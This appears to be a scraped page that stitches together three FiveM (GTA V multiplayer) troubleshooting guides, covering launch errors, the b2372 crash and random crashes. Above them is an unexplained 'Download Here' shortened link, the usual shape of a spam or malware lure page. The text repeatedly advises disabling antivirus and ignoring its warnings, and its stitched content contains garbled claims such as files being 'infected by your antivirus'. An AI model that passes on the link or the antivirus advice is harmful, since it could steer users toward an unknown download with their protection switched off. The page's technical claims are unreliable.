Download Here ---> https://tinyurl.com/ycx3x5fn?id=2930631



Client issues


Getting game crashes? Can't launch FiveM? Or maybe running into some more obscure issue? Find the most common issues here.


I crash when playing on a server


Crashes are fairly often related to a server-specific issue. To make sure your crash isn't related to a specific server, it is advised to join the FiveM.net testing server. If that server works without your issue, we recommend you to contact the server owners of the server where you're experiencing crashes on. Otherwise, read on.


I've been banned on a server


FiveM is not responsible for what you do on servers, or what server admins do to you. If you believe you've been falsely banned from a server, contact the server owners. FiveM can not and will not provide support for this matter.


I've been globally banned from FiveM


Could not find game executable


Locate the CitizenFX.ini file within your FiveM Application Data and make sure it is pointing to the correct path. Open the file with a text editor like Notepad and edit the path to your GTA V installation if necessary.


FiveM is already installed


After you installed FiveM, you don't need to use the same FiveM.exe file anymore. Use the shortcut from your Windows start menu. Press the Start button on your taskbar and look for FiveM there.


If you uninstalled FiveM by deleting the shortcut, you might have to uninstall FiveM properly.


Game cache outdated


Press Yes if the dialog asks Do you wish to continue? . If you get an error like DLC files are missing , make sure your game is up to date by following the instructions in the dialog. Also, make sure your CitizenFX.ini points to the correct GTA V installation. You can find that file within your FiveM application data.


Error generating ROS entitlement token


Certain antivirus vendors are known to block FiveM for unknown reasons. Disable your antivirus and try again.


Error loading component xyz.dll


Delete caches.xml from your FiveM application data folder. If there is no such file, delete the entire application data folder and run FiveM again. For adhesive.dll also see below.


Error loading component adhesive.dll


Your Windows 10 installation is outdated. Please update it to at least version 1703. To check your current version, open command prompt and type winver .


Opening database (privcache:/) failed: IO error: could not lock file


Your privcache got corrupted. Please remove the "priv" folder from the cache folder located in your FiveM application data.


Entry Point Not Found


Delete v8.dll , v8_libbase.dll , v8_libplatform.dll if available in your C:\Windows\system32 directory. These are (leftover) files from other applications that incorrectly use system32 to place these files. FiveM loads dll's from system32 first, resulting in these incorrect dll's being loaded.


Moving of xyz.exe failed (err = 32)


First check your taskmanager for existing fivem processes if you see them close them, if that doesn’t fix the issue try disabling your antivirus.


Stuck on 'We're getting there and it will be worth the wait'


Often caused by aggressive antivirus settings. Disable your antivirus and try again.


Stuck on a rotating splash screen


Delete %appdata%\citizenfx\ros_id.dat and %localappdata%\digitalentitlements .


Stuck on a black screen


This is a common issue with certain NVIDIA drivers. Stay patient, it takes a minute to load. This often happens to other games too.


Stuck on a colored background but no menu


This happens on specific older AMD laptop GPUs. Unfortunately, this is caused by CEF and not by FiveM. Once the issue has been fixed in CEF, FiveM will be updated too. A forum moderator has created a topic that could potentially rectify this issue. Click here for more info.


FiveM uninstalls itself after running it!


This is most likely your antivirus software removing FiveM. Unfortunately some antivirus vendors falsely flag FiveM, and remove some (or even all) FiveM files as a precaution. You can safely ignore any warnings about this. 
Click here for more info on how to disable your antivirus.


My game is dropping frames and I have decent hardware


If you believe your game is dropping frames for whatever reason, you may want to take what's called a 'trace'. A trace can be used to capture game function calls and allows developers to see where an application is taking longer than expected to execute, causing performance drops.


Download the etwpackage zip file from the Assets section and extract it, optionally, you can click here to download it. Make sure you are downloading the zip file that contains the binaries and not the source code.


After extracting the zip file:



  
Navigate to the etwpackage folder

  
Navigate to the bin folder

  
Execute UIforETW.exe by double clicking it.




You will see a couple options there (to the right, in the checkbox section), leave them as is and follow the next steps:



  
Wait for the game/application to drop frames.

  
Once your game begins to drop frames click on ‘Start Tracing’.

  
Let it run for a minute.

  
Click on Save Trace Buffers after that. Remember to upload the trace afterwards.




Traces will most likely end up saved under C:\Users\xxxx\Documents\etwtraces . In UI For ETW's window there's a list of saved traces, you can click on. Click on the trace with the most recent date and proceed by clicking on 'Browse Folder' afterwards.


You can use services such as Google drive to upload your trace.


I have an NVIDIA GPU and FiveM hanged


FiveM hangs when using NVIDIA GPUs as of recently are not uncommon (especially on most recent drivers), efforts were made, trying to contact NVIDIA, but no clear response was given. As of now, we're trying to figure out a way to resolve hangs for this specific GPU vendor, but we need your help on this, and here's how you can help us:


Once the NVIDIA 'crash' dialog is shown, follow these steps:



  
Hold WinKey + R and type taskmgr followed by enter, it's important that you don't close the process while following this guide.

  
Once Task Manager opens, go into the Details tab.

  
Find FiveM_GTAProcess.exe , right click it and click on Create dump file .

  
Wait until the process is dumped, it will be created in the following directory: C:\Users\xxxx\AppData\Local\Temp\FiveM_GTAProcess.DMP

  
Click Open File Location and zip up the following file: FiveM_GTAProcess.DMP , you can zip up a file by right clicking it, followed by clicking Send To -> Compressed (zipped) folder on the context menu.

  
Contact CFX Support or one of the elements on our Discord once you have the process dump ready to send.




Additionally, you may still enjoy FiveM by rolling back to older drivers such as 471, but we encourage you to send these reports, prior to doing this!


Help! I can't find my issue here!


We are more than happy to help you out! If you're running into crashes or freezes, please post your issue on our forums. Provide as much detail as you can, that will make it easier for everyone to help you. For all other issues, you are more than welcome to join our Discord and have a chat with us.



  
I crash when playing on a server

  
I've been banned on a server

  
I've been globally banned from FiveM

  
Could not find game executable

  
FiveM is already installed

  
Game cache outdated

  
Error generating ROS entitlement token

  
Error loading component xyz.dll

  
Error loading component adhesive.dll

  
Opening database (privcache:/) failed: IO error: could not lock file

  
Entry Point Not Found

  
Moving of xyz.exe failed (err = 32)

  
Stuck on 'We're getting there and it will be worth the wait'

  
Stuck on a rotating splash screen

  
Stuck on a black screen

  
Stuck on a colored background but no menu

  
FiveM uninstalls itself after running it!

  
My game is dropping frames and I have decent hardware

  
I have an NVIDIA GPU and FiveM hanged

  
Help! I can't find my issue here!




How to Fix “FiveM_b2372_GTA” Crash Error on Windows?


You may experience this error while playing on FiveM. The error occurs when the FiveM_b2372_GTA file has crashed, which runs in the background, therefore. Your game crashes and you will have to restart, however, it’s not a solution for this.


how to fix FiveM b2372 error


We had a look into this, and we have listed some causes below:-



  
Infected FiveM_b2372_GTA- If FiveM_b2372_GTA uses too much CPU and Memory, in that case, FiveM_b2372_GTA may be infected by your antivirus and might be a reason for the crash.

  
Corrupted FiveM files- If your FiveM file gets corrupted or deleted by Windows or antivirus, you may get this error.

  
Malware Infection- If there is a malware file inside FiveM Files, you might get this FiveM_b2372 error. Scan your computer with Windows defender or your trusted antivirus software.




Now that we know the causes, let’s jump into some effective troubleshooting methods that helped users fix this FiveM_b2372_GTA error.


Delete Cache Files


Users reported that deleting the cache files resolves their FiveM_b2372_GTA error, clearing the cache will remove junk files from your game and keep things clean.


Here you can delete cache files.



  
Press Windows + R keys to open Run Window. Type app data in run window

  
Type AppData in the Search Box, navigate to the Local folder.

  
Look for the FiveM folder, then go to FiveM Application data. Navigate to FiveM application data

  
Here you have to delete the crashes folder. Basically crashes folder has all crashes reports saved in a file format.

  
Then, navigate to the data folder, you can see a couple of folders, one is cache and the other is game storage. Delete game storage and cache folder

  
First, delete the cache folder check if the persists, if the error is not solved then delete the game-storage folder, after deleting the game-storage folder, you need to update the FiveM.




Delete Logs Files


The logs files contain error details and other information about the FiveM, deleting the log files might fix your error, to delete the logs files follow the steps below.



  
Go back to the FiveM Application data directory and navigate to the logs folder.

  
Delete all files in the logs folder. Click on the delete option.

  
After this, open the game and check if the error persists.




Modify Your CitizenFx File


CitizenFX is a configuration file of FveM that saves the directory and SavedBuildNumber of your game, modifying the CitizenFX may fix your FiveM_b2372 error, to modify your citizenFx follow the steps below:



  
Open the Run Window by pressing Windows + R keys.

  
Type AppData in the Run Window.

  
Navigate to the FiveM folder, then click on the FiveM Application data.

  
Look for the CitizenFX file, then open the file with notepad. Open citizenFX file

  
Remove the SavedBuilderNumber. RemovedSavedBuildNumber

  
Save your file and run the FiveM and check if the error persists.




Cleanup Your Disk


Running the disk cleanup may fix your error, you can safely delete all temporary files, unnecessary programs, and cache files using this utility .


Here is how you can clean up your disk:



  
Open the Run Window by pressing the Window + R keys.

  
Type cleanmgr in the Run Window, and press enter key. type cleanmgr in the run Window

  
A short Window will appear where the C drive is preselected, press ok to execute select c disk

  
After this, tick all the options in the disk cleanup Window. tick all the options in disk cleanup

  
Press ok to execute the cleanup process, once done, check if the error is gone.




Verify Your Game Files


There might be a possibility that the error is occurring because of the missing game files, to fix this. You will have to verify your game, and it will fill the missing files into the game.


Verify your game according to your game launcher with the given methods below.


Verifying with Epic Games Launcher



  
Open Epic Games Launcher and go to the Library tab.

  
Look for GTA, you can find the three dots on the right side of the game section, click on that.

  
Then, select the Verify option, and it should start the verification process, once done, check the improvement. Select verify




Verifying with Steam Launcher



  
Open the Stream Launcher and go to the Library tab.

  
Right-click on the GTA, then select the Properties. select properties of the game

  
Click on the Local Files tab, then click on the VERIFY INTEGRITY OF GAME FILES. Verify integrity files

  
It should start verifying your game, once done, check the improvement.




Verifying with Rockstar Games



  
Open Rockstar Games, you can find the settings tab on the top right, click on it.

  
Look for the GTA, it should be under the My installed games, if you cannot find GTA, use the SCAN option in the settings tab, then select VERIFY INTEGRITY option on the right pane. 
Select the verify integrity




If you have an outdated version of the game , in that case. You can verify your files using an alternative method.



  
First, you have to send the GTA launcher to the desktop as a shortcut.

  
Open your game directory, right-click on the GTA launcher.

  
Hower the Send to option, then click on the Desktop(create shortcut).  Make a shortcut to desktop

  
Right-click on the GTA launcher shortcut on the desktop, go to Properties. Select properties option of GTA launcher

  
Make sure you are on the Shortcut tab, add -verify at the end of the target value, then press ok to save. Renaming the target value of the GTA-5 launcher

  
Open the launcher, and it will start verifying the game files, once done, check the improvement.




Close All the Unnecessary Background Apps


When you start playing on FiveM, close all the unnecessary background applications because unnecessary applications use your Ram and Cpu, making your Fivem application slow and sometimes might crash.


Re-install FiveM


If all the given methods did not work for you and If FiveM_b2372_GTA gets corrupted by the Windows defender or antivirus, then, Re-installing the FiveM will fix your error, uninstall the FiveM from the control panel, then download FiveM from the official website.


We hope you have successfully solved the FiveM_b2372_GTA error, if you have any doubts, we would like to hear the comments below.


How to Fix FiveM Randomly Crashing on Windows 10/11


A lot of FiveM players have encountered some crashing errors that are not letting them play the game properly. These crashes are happening randomly while the players are playing. When the crash happens, a message appears on their screen telling them that the app has stopped working. This error is typically encountered on PC on Windows 10 and Windows 11.


How to Fix FiveM Random Crashes


After a lot of reports were made by a lot of affected players, we have investigated this issue closely and come up with a shortlist of causes that might trigger this FiveM error:



  
Incompatible audio device – This some cases, this FiveM error has occurred because the game was not compatible with some audio devices on your PC. This can be fixed by disabling all the devices that you are not using from the Sound Settings.

  
Problems with the GPU drivers – Some players have found out that the trigger for these random crashes was the GPU drivers. They have managed to fix this by uninstalling the GPI drivers that they are currently using, then installing the latest updates available.

  
Cache files – Another cause for this error might be the FiveM temporary files that are being stored by your PC. These files could be causing the game to not work properly, making random crashes happen. To fix this, you need to delete all the files inside the cache folder, except the game folder.

  
Outdated BIOS – The FiveM random crashes error could be also caused by the BIOS of your motherboard, which is missing some updates that are crucial for the game to work. In order to fix this, you need to download and install the available updates for your specific motherboard.




Now that you are aware of all the possible causes, here is a list of methods that could help you fix this FiveM problem:


1. Disable all unused audio devices


One of the first things that players suggest doing is to disable all the audio devices that you are not using at the moment. You can easily do this from the sound settings of your computer.


There is no official explanation on why this method is effective, but the FiveM community members are speculating that there’s a logical issue with the audio queue management engine that makes the game crash whenever the rendering computer has an unused audio device laying around in idle mode.


Note: This guide is for Windows 11 users, so if your Windows version is older and you need help check online for the exact steps.


In case you don’t know how to do this, here are the steps you need to follow:



  
You need to start by right-clicking on the volume button located on the right side of your taskbar.

  
After that, click on Sound settings from the context menu that just appeared. Accessing the Sound Settings menu

  
Once you are inside the Sound settings, scroll down until you see More sound settings. When you locate it, click it. Accessing the More Sound menu

  
After that, you will see a list of your sound devices. Right-click on the one that you want to disable, then click on Disable.  Disable the unused Audio devices

  
Now you need to close the settings and launch FiveM to see if it still crashes. If the game didn’t crash at startup, repeat the same action that was previously crashing FiveM to make sure that the problem is now resolved.




In case the game still crashes, go check below the next possible method.


2. Reinstall GPU drivers


Another fix that was helpful for other users is to uninstall the GPU drivers installed on your PC, then reinstall them. This will be effective in those scenarios where the problem is occurring consistently (possibly with other games, not just FiveM).


Potential scenarios where you’ll see this problem occurring are an interrupted update, a conflicting driver, or a situation where you consistently denied your PC from updating the GPU drivers.


You can find the latest updates for your GPU on your hardware manufacturer’s official site, but first, you need to clear your current drives and make sure you don’t leave behind any remnant files that might cause the same kind of issue.


Note: In order to do this effectively, you should first enter the Startup Settings menu and ensure that your PC is booting in Safe Mode. This will ensure that the DDU (a tool that we’ll use for uninstalling the current drivers) has the necessary permissions and it’s not interfered with by another 3rd party component.


Here are the steps you need to follow to see how to reinstall your GPU drivers using the Display Driver Uninstaller tool :



  
The first thing you need to do is to download the Display Driver Uninstaller. You can do this from the official site. Downloading Display Driver uninstaller

  
Once you’ve done that, extract the files inside a folder and open it. After that, double click on the file inside it and extract the app wherever you want. It will be easy to find if you extract it in this folder. Opening the DDU executable

  
After that, you need to make sure that your PC is not connected to the internet.

  
Follow the on-screen instructions to complete the uninstallation of your active GPU drivers. Confirm every prompt and provide admin access if you’re asked to do this.

  
Once you’ve done that and the GPU drivers are effectively uninstalled, click on the Start button and click on the Power button, then press and hold the Shift button on your keyboard and click on Restart.  Restarting your PC Note: This operation will allow you to restart directly into the Startup Settings menu so you can boot in Safe Mode.

  
After you are taken to the Choose an option screen, select Troubleshoot, then Advanced options. Now click on Startup Settings and confirm the decision. Booting directly into the startup options menu

  
Now you need to press 4 on your keyboard to boot your PC in safe safe mode.

  
After that, go to the folder that you have installed DDU to and launch the app.

  
Once the app is on your screen, leave the options as default and select your device type from the right side, then select your device as well. Select GPU and the current device manufacturer you’re using. Choose the GPU manufacturer inside the Display Driver Uninstaller screen

  
After you choose the correct options, click on the Clean and restart button located on the left side. Deploy a Clean and restart procedure via the Display Driver Uninstaller

  
Now you should wait a few seconds until the drivers are completely uninstalled. After your PC boots back, you need to download the latest updates for your GPU from the following places:




Nvidia drivers AMD drivers Intel drivers


If you were already using the latest driver versions, move down to the next method below.


3. Clear FiveM cache (except game folder)


This FiveM issue could be also caused by some temporary files that your PC is storing. It was reported that this can be simply fixed by deleting all the files inside the cache folder, except the game folder. Thes files can be located inside the AppData folder.


Note: This method is mostly reported to be effective in situations where you recently installed an official or unofficial patch for your GTA V framework. Try the steps below to clear your FiveM cache and if it doesn’t work, simply reinstall the FiveM installation from scratch to ensure you’re not dealing with some type of corruption.


In case you don’t know how to clear the cache, here’s a guide that will help you do it:



  
Open a Run dialog box by pressing the Windows key + R buttons and type inside the search bar ‘appdata’.  Open the AppData folder

  
Next, press Enter to open the AppData folder.

  
Now that you are inside the AppData folder, access the Local folder and search for the FiveM folder, then select it. Access the FiveM folder

  
After that, double click on the FiveM Application Data folder to open it. Inside it, select all the files except the game folder and delete them. Delete everything except the game folder

  
In some cases, there could be a caches file inside the FiveM Application Data folder. If you locate it, delete the file as well.

  
Now you can close the folder. Launch FiveM and test it to see if the random crashes are still happening.




In case you still encounter the error, check below the last possible method that could help you stop the issue.


4. Update your BIOS if available


The last thing you can try that has fixed the random crashes on FiveM is to try to update the BIOS for your motherboard. This problem might be happening because the BIOS is outdated, causing the game to not work properly.


The developers of this model have confirmed that this newer GTA framework requires a certain BIOS update due to the way the game is rendered on AMD GPUs.


In case you don’t know how to update your BIOS, here are the general instructions you need to follow:


Note: Keep in mind that every manufacturer has a different tool that is used for installing BIOS updates and every scenario is different. The instructions below should only be looked at as general guidelines – makes sure you consult the official documentation from your motherboard manufacturer on how to update your BIOS firmware.



  
Visit the official site of your motherboard manufacturer and find the latest updates available for your graphics card. Once you find it, download it locally. Downloading the BIOS update Note: In some cases, you can find updates that you can install directly from Windows or updates that you need to put on a USB flash drive and install directly from your BIOS. In case the updates are only available to install from a flash drive, search online for the specific instructions for your motherboard manufacturer.

  
Now you need to download the file. After is fully downloaded, extract the compressed file into a folder and open the file to begin the installation of the update. Install the BIOS update

  
Once the installation has begun, wait until the update is fully installed.

  
After that, restart your PC, and when it boots back launch FiveM to see if it still randomly crashes.

